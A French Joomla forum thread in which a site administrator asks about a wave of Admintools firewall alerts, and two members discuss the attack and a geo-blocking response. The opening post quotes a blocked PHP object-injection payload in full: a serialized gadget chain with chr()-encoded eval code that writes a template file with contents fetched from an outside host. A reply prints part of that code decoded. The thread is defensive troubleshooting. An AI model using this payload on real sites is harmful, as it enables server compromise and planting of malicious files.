Admintools - Alertes Bouclier MUA - IP inconnue

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • Admintools - Alertes Bouclier MUA - IP inconnue

    Bonjour,

    Depuis le 10 octobre, j'ai une recrudescence d'alertes et de blocages sur le bouclier MUA d'Admintools.

    Je n'arrive pas à avoir d'infos sur les IP car Admintool ne me renvoie que ce type de chaines
    }_broken|s:2:"@1";__test1|O:21:"JDatabaseDriverMys qli":3:{s:19:"\0\0\0_simplePieLoader";O:17:"JSimp l epieFactory":0:{}s:13:"\0\0\0connection";i:1;s:21: "\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O :9:" SimplePie":5:{s:8:"feed_url";s:1553:"eval(chr(101) .chr(99).chr(104).chr(111).chr(32).chr(109).chr(10 0).chr(53).chr(40).chr(34).chr(49).chr(50).chr(51) .chr(52).chr(53).chr(34).chr(41).chr(59).chr(32).c hr(102).chr(105).chr(108).chr(101).chr(95).chr(112 ).chr(117).chr(116).chr(95).chr(99).chr(111).chr(1 10).chr(116).chr(101).chr(110).chr(116).chr(115).c hr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr (86).chr(69).chr(82).chr(91).chr(34).chr(68).chr(7 9).chr(67).chr(85).chr(77).chr(69).chr(78).chr(84) .chr(95).chr(82).chr(79).chr(79).chr(84).chr(34).c hr(93).chr(46).chr(34).chr(47).chr(116).chr(101).c hr(109).chr(112).chr(108).chr(97).chr(116).chr(101 ).chr(115).chr(47).chr(115).chr(121).chr(115).chr( 116).chr(101).chr(109).chr(47).chr(104).chr(116).c hr(109).chr(108).chr(47).chr(105).chr(110).chr(100 ).chr(101).chr(120).chr(46).chr(112).chr(104).chr( 116).chr(109).chr(108).chr(34).chr(44).chr(32).chr (102).chr(105).chr(108).chr(101).chr(95).chr(103). chr(101).chr(116).chr(95).chr(99).chr(111).chr(110 ).chr(116).chr(101).chr(110).chr(116).chr(115).chr (40).chr(34).chr(104).chr(116).chr(116).chr(112).c hr(58).chr(47).chr(47).chr(111).chr(110).chr(108). chr(97).chr(114).chr(115).chr(105).chr(103).chr(11 1).chr(114).chr(116).chr(97).chr(46).chr(110).chr( 101).chr(116).chr(47).chr(116).chr(101).chr(109).c hr(112).chr(108).chr(97).chr(116).chr(101).chr(115 ).chr(47).chr(115).chr(121).chr(115).chr(116).chr( 101).chr(109).chr(47).chr(99).chr(115).chr(115).ch r(47).chr(115).chr(116).chr(121).chr(108).chr(101) .chr(46).chr(99).chr(115).chr(115).chr(34).chr(41) .chr(41).chr(59));JFactory::getConfig();";s:5:"cac he";b:1;s:8:"sanitize";O:20:"JDatabaseDriverMysq l" :0:{}s:19:"cache_name_function";s:6:"assert";s:11: "cache_class";O:20:"JDatabaseDriverMysql":0:{} }i:1 ;s:4:"init";}}};
    le terme __broken|s:2 se changeant parfois par __test|O:21

    Ces alertes de sécurité se produisant simultanément avec d'autres tentatives d'intrusion d'IP Russes et Ukrainiennes, j'ai bloqué ces deux régions sur la plupart des sites clients, mais certains d'entre-eux ont un rayonnement internationnal et je ne peux pas activer le blocage par géolocalisation.

    Avez-vous des choses similaires ou entendu parlé ??

    Dol.
    Je préfère éclairer que briller.” - “J'ai peut-être l'air froid, mais je suis pas givré.- "ça dépend ça dépasse"
    Ne m'envoyez pas de message privé pour résoudre vos problèmes sans y avoir été invité.
    Dolmenhir : tailleur de site web depuis 1997. Spécialiste Joomla depuis 2005. https://www.dolmenhir.fr

  • #2
    Salut

    Le décryptage de la première partie du code donne

    Code:
    echo md5("12345"); file_put_contents($_SERVER["DOCUMENT_ROOT"]."/templates/system/html/index.phtml",
    Cela me fait penser à une attaque vieille de plus de 18 mois lorsqu'on des hackeurs changeaient le HTTP_REFERER pour y mettre du code PHP qui était interpreté (et exécuté) par les versions PHP inférieure à PHP 5.4 (de mémoire).
    Christophe (cavo789)
    Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
    Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

    Commentaire


    • #3
      Ben là le serveur est en 5.6 avec passage imminent à la version 7
      Tous les sites sont en 3.8
      J'avais qu'un Wordpress suite au rapatriement d'un nouveau client, mais en cours de conversion vers Joomla.
      Je l'ai supprimé et redirigé vers la version Joomla qui est quasi finie (en mode offline)
      Je préfère éclairer que briller.” - “J'ai peut-être l'air froid, mais je suis pas givré.- "ça dépend ça dépasse"
      Ne m'envoyez pas de message privé pour résoudre vos problèmes sans y avoir été invité.
      Dolmenhir : tailleur de site web depuis 1997. Spécialiste Joomla depuis 2005. https://www.dolmenhir.fr

      Commentaire


      • #4
        C'est juste une attaque idiote au petit bonheur la chance...
        Christophe (cavo789)
        Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
        Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

        Commentaire


        • #5
          Ouais, c'est ce que je me dit aussi.
          C'est juste pénible de voir passer toutes ces alertes... et d'un autre côté si mets un filtre pour ne pas être alerté, je prend le risque de passer à côté d'une autre alerte plus importante...
          Mais bon, apparement, depuis que j'ai ajouté certains pays dans ma liste de blocage j'ai plus d'alerte...
          Mais je me fais pas d'illusion...
          Je préfère éclairer que briller.” - “J'ai peut-être l'air froid, mais je suis pas givré.- "ça dépend ça dépasse"
          Ne m'envoyez pas de message privé pour résoudre vos problèmes sans y avoir été invité.
          Dolmenhir : tailleur de site web depuis 1997. Spécialiste Joomla depuis 2005. https://www.dolmenhir.fr

          Commentaire

          Annonce

          Réduire
          Aucune annonce pour le moment.

          Partenaire de l'association

          Réduire

          Hébergeur Web PlanetHoster
          Travaille ...
          X